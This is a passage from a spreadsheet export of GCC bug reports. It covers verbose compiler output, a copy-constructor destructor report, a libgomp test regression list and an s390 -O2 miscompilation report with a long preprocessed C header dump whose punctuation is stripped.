 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=2 -D__GXX_ABI_VERSION=100 -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tp.C tp.ii
GNU CPP version 2.97 20010129 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/i686-pc-linux-gnu/include/g++-v3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1plus -fpreprocessed tp.ii -quiet -dumpbase tp.C -g -W -Wall -version -o tp.s
GNU CPP version 2.97 20010129 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 2.97 20010129 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010129 (experimental).
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o tp.o tp.s
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o tp /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../../../i686-pc-linux-gnu/lib -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../.. tp.o -lstdc++ -lm -lgcc -lc -lgcc /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/crtend.o /usr/lib/crtn.o
Bzip2 compressed preprocessed source file tp.ii.bz2 follows
See attachments for tp.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-617</t>
  </si>
  <si>
    <t>g++ uses double memory space when no copy constructor is defined</t>
  </si>
  <si>
    <t>(sorry my english is not my mother language and i've
 no dictionnary at my office. hope you'll understand 
 my bug report !)
I 've created a class 'thing' and written a function 'fct'
with a 'thing b' as parameter.
When no copy constructor is defined i've observed 2 calls
to thing destructor at the end of function 'fct'.
That means that for one parameter two copies are done.
But only one is used in fct (i've modified b to see that).
Results of file 'thing.cpp' :
-------------------------------------------------------------
    + usual const. - object addr :0xbffffb88
******** BEFORE FCT *******
Release:
2.95.2 CVS 20010506
Environment:
PC with Pentium III processor
under Debian GNU/Linux
How-To-Repeat:
compile file 'thing.cpp'</t>
  </si>
  <si>
    <t>conchodo</t>
  </si>
  <si>
    <t>GCC-43800</t>
  </si>
  <si>
    <t>[4.6 regression] FAIL: libgomp.c++/for-4.C</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 158513 gave
FAIL: libgomp.c++/for-3.C  -O0  (test for excess errors)
FAIL: libgomp.c++/for-3.C  -O1  (test for excess errors)
FAIL: libgomp.c++/for-3.C  -O2  (test for excess errors)
FAIL: libgomp.c++/for-3.C  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: libgomp.c++/for-3.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: libgomp.c++/for-3.C  -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
FAIL: libgomp.c++/for-3.C  -O3 -g  (test for excess errors)
FAIL: libgomp.c++/for-3.C  -Os  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -O0  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -O1  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -O2  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -O3 -g  (test for excess errors)
FAIL: libgomp.c++/for-4.C  -Os  (test for excess errors)
Revision 158505 is OK. It may be cause by revision 158508:
http://gcc.gnu.org/ml/gcc-cvs/2010-04/msg00614.html</t>
  </si>
  <si>
    <t>GCC-28146</t>
  </si>
  <si>
    <t>-O2 produces invalid code on s390-linux-gnu: gcc-4.1.2 20060608</t>
  </si>
  <si>
    <t xml:space="preserve">
This started because coreutils' new sha2 programs failed their tests on s390.
======================
gcc -v output:
Using built-in specs.
Target: s390-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++javafortranobjcobj-c++adatreelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.1-1.4.2.0/jre --enable-mpfr --enable-checking=release s390-linux-gnu
Thread model: posix
gcc version 4.1.2 20060608 (prerelease) (Debian 4.1.1-3)
======================
Environment:
System: Linux raptor 2.6.12-1-s390x #1 SMP Tue Sep 27 09:43:57 UTC 2005 s390x GNU/Linux
Architecture: s390x
host: s390-ibm-linux-gnu
build: s390-ibm-linux-gnu
target: s390-ibm-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javafortranobjcobj-c++adatreelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.1-1.4.2.0/jre --enable-mpfr --enable-checking=release s390-linux-gnu
How-To-Repeat:
# Correct output when compiled with -O
$ gcc -I.. -I. -g -O ~/j.c &amp;&amp; ./a.out
38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da274edebfe76f65fbd51ad2f14898b95b
# Invalid output when compiled with -O2
$ gcc -I.. -I. -g -O2 ~/j.c &amp;&amp; ./a.out
517189ab07d222a14e0dcfcf6208ebffac951f89e8cbb81636706f714aacb757a8c8fb9e4474ab7b2e809f7a82fe9130
Here's j.i:
typedef signed char int8_t
typedef short int int16_t
typedef int int32_t
__extension__
typedef long long int int64_t
typedef unsigned char uint8_t
typedef unsigned short int uint16_t
typedef unsigned int uint32_t
__extension__
typedef unsigned long long int uint64_t
typedef signed char int_least8_t
typedef short int int_least16_t
typedef int int_least32_t
__extension__
typedef long long int int_least64_t
typedef unsigned char uint_least8_t
typedef unsigned short int uint_least16_t
typedef unsigned int uint_least32_t
__extension__
typedef unsigned long long int uint_least64_t
typedef signed char int_fast8_t
typedef int int_fast16_t
typedef int int_fast32_t
__extension__
typedef long long int int_fast64_t
typedef unsigned char uint_fast8_t
typedef unsigned int uint_fast16_t
typedef unsigned int uint_fast32_t
__extension__
typedef unsigned long long int uint_fast64_t
typedef int intptr_t
typedef unsigned int uintptr_t
__extension__
typedef long long int intmax_t
__extension__
typedef unsigned long long int uintmax_t
typedef long unsigned int size_t
extern void *memcpy (void *__restrict __dest
       __const void *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern void *memmove (void *__dest __const void *__src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern void *memccpy (void *__restrict __dest __const void *__restrict __src
        int __c size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern void *memset (void *__s int __c size_t __n) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1)))
extern int memcmp (__const void *__s1 __const void *__s2 size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern void *memchr (__const void *__s int __c size_t __n)
      __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern void *rawmemchr (__const void *__s int __c)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern void *memrchr (__const void *__s int __c size_t __n)
      __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern char *strcpy (char *__restrict __dest __const char *__restrict __src)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strncpy (char *__restrict __dest
        __const char *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strcat (char *__restrict __dest __const char *__restrict __src)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strncat (char *__restrict __dest __const char *__restrict __src
        size_t __n) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern int strcmp (__const char *__s1 __const char *__s2)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern int strncmp (__const char *__s1 __const char *__s2 size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern int strcoll (__const char *__s1 __const char *__s2)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern size_t strxfrm (char *__restrict __dest
         __const char *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (2)))
typedef struct __locale_struct
{
  struct locale_data *__locales[13]
  const unsigned short int *__ctype_b
  const int *__ctype_tolower
  const int *__ctype_toupper
  const char *__names[13]
} *__locale_t
extern int strcoll_l (__const char *__s1 __const char *__s2 __locale_t __l)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2 3)))
extern size_t strxfrm_l (char *__dest __const char *__src size_t __n
    __locale_t __l) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (2 4)))
extern char *strdup (__const char *__s)
     __attribute__ ((__nothrow__)) __attribute__ ((__malloc__)) __attribute__ ((__nonnull__ (1)))
extern char *strndup (__const char *__string size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__malloc__)) __attribute__ ((__nonnull__ (1)))
extern char *strchr (__const char *__s int __c)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern char *strrchr (__const char *__s int __c)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern char *strchrnul (__const char *__s int __c)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern size_t strcspn (__const char *__s __const char *__reject)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern size_t strspn (__const char *__s __const char *__accept)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strpbrk (__const char *__s __const char *__accept)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strstr (__const char *__haystack __const char *__needle)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strtok (char *__restrict __s __const char *__restrict __delim)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (2)))
extern char *__strtok_r (char *__restrict __s
    __const char *__restrict __delim
    char **__restrict __save_ptr)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (2 3)))
extern char *strtok_r (char *__restrict __s __const char *__restrict __delim
         char **__restrict __save_ptr)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (2 3)))
extern char *strcasestr (__const char *__haystack __const char *__needle)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern void *memmem (__const void *__haystack size_t __haystacklen
       __const void *__needle size_t __needlelen)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 3)))
extern void *__mempcpy (void *__restrict __dest
   __const void *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern void *mempcpy (void *__restrict __dest
        __const void *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern size_t strlen (__const char *__s)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern size_t strnlen (__const char *__string size_t __maxlen)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern char *strerror (int __errnum) __attribute__ ((__nothrow__))
extern char *strerror_r (int __errnum char *__buf size_t __buflen)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (2)))
extern void __bzero (void *__s size_t __n) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1)))
extern void bcopy (__const void *__src void *__dest size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern void bzero (void *__s size_t __n) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1)))
extern int bcmp (__const void *__s1 __const void *__s2 size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern char *index (__const char *__s int __c)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern char *rindex (__const char *__s int __c)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern int ffs (int __i) __attribute__ ((__nothrow__)) __attribute__ ((__const__))
extern int ffsl (long int __l) __attribute__ ((__nothrow__)) __attribute__ ((__const__))
__extension__ extern int ffsll (long long int __ll)
     __attribute__ ((__nothrow__)) __attribute__ ((__const__))
extern int rpl_strcasecmp (__const char *__s1 __const char *__s2)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern int strncasecmp (__const char *__s1 __const char *__s2 size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern int strcasecmp_l (__const char *__s1 __const char *__s2
    __locale_t __loc)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2 3)))
extern int strncasecmp_l (__const char *__s1 __const char *__s2
     size_t __n __locale_t __loc)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2 4)))
extern char *strsep (char **__restrict __stringp
       __const char *__restrict __delim)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern int strverscmp (__const char *__s1 __const char *__s2)
     __attribute__ ((__nothrow__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strsignal (int __sig) __attribute__ ((__nothrow__))
extern char *__stpcpy (char *__restrict __dest __const char *__restrict __src)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern char *stpcpy (char *__restrict __dest __const char *__restrict __src)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern char *__stpncpy (char *__restrict __dest
   __const char *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern char *stpncpy (char *__restrict __dest
        __const char *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
extern char *strfry (char *__string) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1)))
extern void *memfrob (void *__s size_t __n) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1)))
extern char *basename (__const char *__filename) __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1)))
typedef unsigned char __u_char
typedef unsigned short int __u_short
typedef unsigned int __u_int
typedef unsigned long int __u_long
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
__extension__ typedef long long int __quad_t
__extension__ typedef unsigned long long int __u_quad_t
__extension__ typedef __u_quad_t __dev_t
__extension__ typedef unsigned int __uid_t
__extension__ typedef unsigned int __gid_t
__extension__ typedef unsigned long int __ino_t
__extension__ typedef __u_quad_t __ino64_t
__extension__ typedef unsigned int __mode_t
__extension__ typedef unsigned int __nlink_t
__extension__ typedef long int __off_t
__extension__ typedef __quad_t __off64_t
__extension__ typedef int __pid_t
__extension__ typedef struct { int __val[2] } __fsid_t
__extension__ typedef long int __clock_t
__extension__ typedef unsigned long int __rlim_t
__extension__ typedef __u_quad_t __rlim64_t
__extension__ typedef unsigned int __id_t
__extension__ typedef long int __time_t
__extension__ typedef unsigned int __useconds_t
__extension__ typedef long int __suseconds_t
__extension__ typedef int __daddr_t
__extension__ typedef long int __swblk_t
__extension__ typedef int __key_t
__extension__ typedef int __clockid_t
__extension__ typedef int __timer_t
__extension__ typedef long int __blksize_t
__extension__ typedef long int __blkcnt_t
__extension__ typedef __quad_t __blkcnt64_t
__extension__ typedef unsigned long int __fsblkcnt_t
__extension__ typedef __u_quad_t __fsblkcnt64_t
__extension__ typedef unsigned long int __fsfilcnt_t
__extension__ typedef __u_quad_t __fsfilcnt64_t
__extension__ typedef long int __ssize_t
typedef __off64_t __loff_t
typedef __quad_t *__qaddr_t
typedef char *__caddr_t
__extension__ typedef int __intptr_t
__extension__ typedef unsigned int __socklen_t
extern void *__rawmemchr (const void *__s int __c)
extern __inline size_t __strcspn_c1 (__const char *__s int __reject)
extern __inline size_t
__strcspn_c1 (__const char *__s int __reject)
{
  register size_t __result = 0
  while (__s[__result] != '\0' &amp;&amp; __s[__result] != __reject)
    ++__result
  return __result
}
extern __inline size_t __strcspn_c2 (__const char *__s int __reject1
         int __reject2)
extern __inline size_t
__strcspn_c2 (__const char *__s int __reject1 int __reject2)
{
  register size_t __result = 0
  while (__s[__result] != '\0' &amp;&amp; __s[__result] != __reject1
  &amp;&amp; __s[__result] != __reject2)
    ++__result
  return __result
}
extern __inline size_t __strcspn_c3 (__const char *__s int __reject1
         int __reject2 int __reject3)
extern __inline size_t
__strcspn_c3 (__const char *__s int __reject1 int __reject2
       int __reject3)
{
  register size_t __result = 0
  while (__s[__result] != '\0' &amp;&amp; __s[__result] != __reject1
  &amp;&amp; __s[__result] != __reject2 &amp;&amp; __s[__result] != __reject3)
    ++__result
  return __result
}
extern __inline size_t __strspn_c1 (__const char *__s int __accept)
extern __inline size_t
__strspn_c1 (__const char *__s int __accept)
{
  register size_t __result = 0
  while (__s[__result] == __accept)
    ++__result
  return __result
}
extern __inline size_t __strspn_c2 (__const char *__s int __accept1
        int __accept2)
extern __inline size_t
__strspn_c2 (__const char *__s int __accept1 int __accept2)
{
  register size_t __result = 0
  while (__s[__result] == __accept1 || __s[__result] == __accept2)
    ++__result
  return __result
}
extern __inline size_t __strspn_c3 (__const char *__s int __accept1
        int __accept2 int __accept3)
extern __inline size_t
__strspn_c3 (__const char *__s int __accept1 int __accept2 int __accept3)
{
  register size_t __result = 0
  while (__s[__result] == __accept1 || __s[__result] == __accept2
  || __s[__result] == __accept3)
    ++__result
  return __result
}
extern __inline char *__strpbrk_c2 (__const char *__s int __accept1
         int __accept2)
extern __inline char *
__strpbrk_c2 (__const char *__s int __accept1 int __accept2)
{
  while (*__s != '\0' &amp;&amp; *__s != __accept1 &amp;&amp; *__s != __accept2)
    ++__s
  return *__s == '\0' ? ((void *)0) : (char *) (size_t) __s
}
extern __inline char *__strpbrk_c3 (__const char *__s int __accept1
         int __accept2 int __accept3)
extern __inline char *
__strpbrk_c3 (__const char *__s int __accept1 int __accept2
       int __accept3)
{
  while (*__s != '\0' &amp;&amp; *__s != __accept1 &amp;&amp; *__s != __accept2
  &amp;&amp; *__s != __accept3)
    ++__s
  return *__s == '\0' ? ((void *)0) : (char *) (size_t) __s
}
extern __inline char *__strtok_r_1c (char *__s char __sep char **__nextp)
extern __inline char *
__strtok_r_1c (char *__s char __sep char **__nextp)
{
  char *__result
  if (__s == ((void *)0))
    __s = *__nextp
  while (*__s == __sep)
    ++__s
  __result = ((void *)0)
  if (*__s != '\0')
    {
      __result = __s++
      while (*__s != '\0')
 if (*__s++ == __sep)
   {
     __s[-1] = '\0'
     break
   }
      *__nextp = __s
    }
  return __result
}
extern char *__strsep_g (char **__stringp __const char *__delim)
extern __inline char *__strsep_1c (char **__s char __reject)
extern __inline char *
__strsep_1c (char **__s char __reject)
{
  register char *__retval = *__s
  if (__retval != ((void *)0) &amp;&amp; (*__s = (__extension__ (__builtin_constant_p (__reject) &amp;&amp; !__builtin_constant_p (__retval) &amp;&amp; (__reject) == '\0' ? (char *) __rawmemchr (__retval __reject) : __builtin_strchr (__retval __reject)))) != ((void *)0))
    *(*__s)++ = '\0'
  return __retval
}
extern __inline char *__strsep_2c (char **__s char __reject1 char __reject2)
extern __inline char *
__strsep_2c (char **__s char __reject1 char __reject2)
{
  register char *__retval = *__s
  if (__retval != ((void *)0))
    {
      register char *__cp = __retval
      while (1)
 {
   if (*__cp == '\0')
     {
       __cp = ((void *)0)
   break
     }
   if (*__cp == __reject1 || *__cp == __reject2)
     {
       *__cp++ = '\0'
       break
     }
   ++__cp
 }
      *__s = __cp
    }
  return __retval
}
extern __inline char *__strsep_3c (char **__s char __reject1 char __reject2
       char __reject3)
extern __inline char *
__strsep_3c (char **__s char __reject1 char __reject2 char __reject3)
{
  register char *__retval = *__s
  if (__retval != ((void *)0))
    {
      register char *__cp = __retval
      while (1)
 {
   if (*__cp == '\0')
     {
       __cp = ((void *)0)
   break
     }
   if (*__cp == __reject1 || *__cp == __reject2 || *__cp == __reject3)
     {
       *__cp++ = '\0'
       break
     }
   ++__cp
 }
      *__s = __cp
    }
  return __retval
}
extern void *malloc (size_t __size) __attribute__ ((__nothrow__)) __attribute__ ((__malloc__))
extern void *calloc (size_t __nmemb size_t __size)
     __attribute__ ((__nothrow__)) __attribute__ ((__malloc__))
extern char *__strdup (__const char *__string) __attribute__ ((__nothrow__)) __attribute__ ((__malloc__))
extern char *__strndup (__const char *__string size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__malloc__))
typedef struct _IO_FILE FILE
typedef struct _IO_FILE __FILE
typedef int wchar_t
typedef unsigned int wint_t
typedef struct
{
  int __count
  union
  {
    wint_t __wch
    char __wchb[4]
  } __value
} __mbstate_t
typedef struct
{
  __off_t __pos
  __mbstate_t __state
} _G_fpos_t
typedef struct
{
  __off64_t __pos
  __mbstate_t __state
} _G_fpos64_t
enum
{
  __GCONV_OK = 0
  __GCONV_NOCONV
  __GCONV_NODB
  __GCONV_NOMEM
  __GCONV_EMPTY_INPUT
  __GCONV_FULL_OUTPUT
  __GCONV_ILLEGAL_INPUT
  __GCONV_INCOMPLETE_INPUT
  __GCONV_ILLEGAL_DESCRIPTOR
  __GCONV_INTERNAL_ERROR
}
enum
{
  __GCONV_IS_LAST = 0x0001
  __GCONV_IGNORE_ERRORS = 0x0002
}
struct __gconv_step
struct __gconv_step_data
struct __gconv_loaded_object
struct __gconv_trans_data
typedef int (*__gconv_fct) (struct __gconv_step * struct __gconv_step_data *
       __const unsigned char ** __const unsigned char *
       unsigned char ** size_t * int int)
typedef wint_t (*__gconv_btowc_fct) (struct __gconv_step * unsigned char)
typedef int (*__gconv_init_fct) (struct __gconv_step *)
typedef void (*__gconv_end_fct) (struct __gconv_step *)
typedef int (*__gconv_trans_fct) (struct __gconv_step *
      struct __gconv_step_data * void *
      __const unsigned char *
      __const unsigned char **
      __const unsigned char * unsigned char **
      size_t *)
typedef int (*__gconv_trans_context_fct) (void * __const unsigned char *
       __const unsigned char *
       unsigned char * unsigned char *)
typedef int (*__gconv_trans_query_fct) (__const char * __const char ***
     size_t *)
typedef int (*__gconv_trans_init_fct) (void ** const char *)
typedef void (*__gconv_trans_end_fct) (void *)
struct __gconv_trans_data
{
  __gconv_trans_fct __trans_fct
  __gconv_trans_context_fct __trans_context_fct
  __gconv_trans_end_fct __trans_end_fct
  void *__data
  struct __gconv_trans_data *__next
}
struct __gconv_step
{
  struct __gconv_loaded_object *__shlib_handle
  __const char *__modname
  int __counter
  char *__from_name
  char *__to_name
  __gconv_fct __fct
  __gconv_btowc_fct __btowc_fct
  __gconv_init_fct __init_fct
  __gconv_end_fct __end_fct
  int __min_needed_from
  int __max_needed_from
  int __min_needed_to
  int __max_needed_to
  int __stateful
  void *__data
}
struct __gconv_step_data
{
  unsigned char *__outbuf
  unsigned char *__outbufend
  int __flags
  int __invocation_counter
  int __internal_use
  __mbstate_t *__statep
  __mbstate_t __state
  struct __gconv_trans_data *__trans
}
typedef struct __gconv_info
{
  size_t __nsteps
  struct __gconv_step *__steps
  __extension__ struct __gconv_step_data __data []
} *__gconv_t
typedef union
{
  struct __gconv_info __cd
  struct
  {
    struct __gconv_info __cd
    struct __gconv_step_data __data
  } __combined
} _G_iconv_t
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
typedef __builtin_va_list __gnuc_va_list
struct _IO_jump_t struct _IO_FILE
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
}
enum __codecvt_result
{
  __codecvt_ok
  __codecvt_partial
  __codecvt_error
  __codecvt_noconv
}
struct _IO_FILE {
  int _flags
  char* _IO_read_ptr
  char* _IO_read_end
  char* _IO_read_base
  char* _IO_write_base
  char* _IO_write_ptr
  char* _IO_write_end
  char* _IO_buf_base
  char* _IO_buf_end
  char *_IO_save_base
  char *_IO_backup_base
  char *_IO_save_end
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _flags2
  __off_t _old_offset
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
  __off64_t _offset
  void *__pad1
  void *__pad2
  int _mode
  char _unused2[15 * sizeof (int) - 2 * sizeof (void *)]
}
typedef struct _IO_FILE _IO_FILE
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
typedef __ssize_t __io_read_fn (void *__cookie char *__buf size_t __nbytes)
typedef __ssize_t __io_write_fn (void *__cookie __const char *__buf
     size_t __n)
typedef int __io_seek_fn (void *__cookie __off64_t *__pos int __w)
typedef int __io_close_fn (void *__cookie)
typedef __io_read_fn cookie_read_function_t
typedef __io_write_fn cookie_write_function_t
typedef __io_seek_fn cookie_seek_function_t
typedef __io_close_fn cookie_close_function_t
typedef struct
{
  __io_read_fn *read
  __io_write_fn *write
  __io_seek_fn *seek
  __io_close_fn *close
} _IO_cookie_io_functions_t
typedef _IO_cookie_io_functions_t cookie_io_functions_t
struct _IO_cookie_file
extern void _IO_cookie_init (struct _IO_cookie_file *__cfile int __read_write
        void *__cookie _IO_cookie_io_functions_t __fns)
extern int __underflow (_IO_FILE *) __attribute__ ((__nothrow__))
extern int __uflow (_IO_FILE *) __attribute__ ((__nothrow__))
extern int __overflow (_IO_FILE * int) __attribute__ ((__nothrow__))
extern wint_t __wunderflow (_IO_FILE *) __attribute__ ((__nothrow__))
extern wint_t __wuflow (_IO_FILE *) __attribute__ ((__nothrow__))
extern wint_t __woverflow (_IO_FILE * wint_t) __attribute__ ((__nothrow__))
extern int _IO_getc (_IO_FILE *__fp) __attribute__ ((__nothrow__))
extern int _IO_putc (int __c _IO_FILE *__fp) __attribute__ ((__nothrow__))
extern int _IO_feof (_IO_FILE *__fp) __attribute__ ((__nothrow__))
extern int _IO_ferror (_IO_FILE *__fp) __attribute__ ((__nothrow__))
extern int _IO_peekc_locked (_IO_FILE *__fp) __attribute__ ((__nothrow__))
extern void _IO_flockfile (_IO_FILE *) __attribute__ ((__nothrow__))
extern void _IO_funlockfile (_IO_FILE *) __attribute__ ((__nothrow__))
extern int _IO_ftrylockfile (_IO_FILE *) __attribute__ ((__nothrow__))
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict
   __gnuc_va_list int *__restrict) __attribute__ ((__nothrow__))
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict
    __gnuc_va_list) __attribute__ ((__nothrow__))
extern __ssize_t _IO_padn (_IO_FILE * int __ssize_t) __attribute__ ((__nothrow__))
extern size_t _IO_sgetn (_IO_FILE * void * size_t) __attribute__ ((__nothrow__))
extern __off64_t _IO_seekoff (_IO_FILE * __off64_t int int) __attribute__ ((__nothrow__))
extern __off64_t _IO_seekpos (_IO_FILE * __off64_t int) __attribute__ ((__nothrow__))
extern void _IO_free_backup_area (_IO_FILE *) __attribute__ ((__nothrow__))
typedef __gnuc_va_list va_list
typedef _G_fpos64_t fpos_t
typedef _G_fpos64_t fpos64_t
extern struct _IO_FILE *stdin
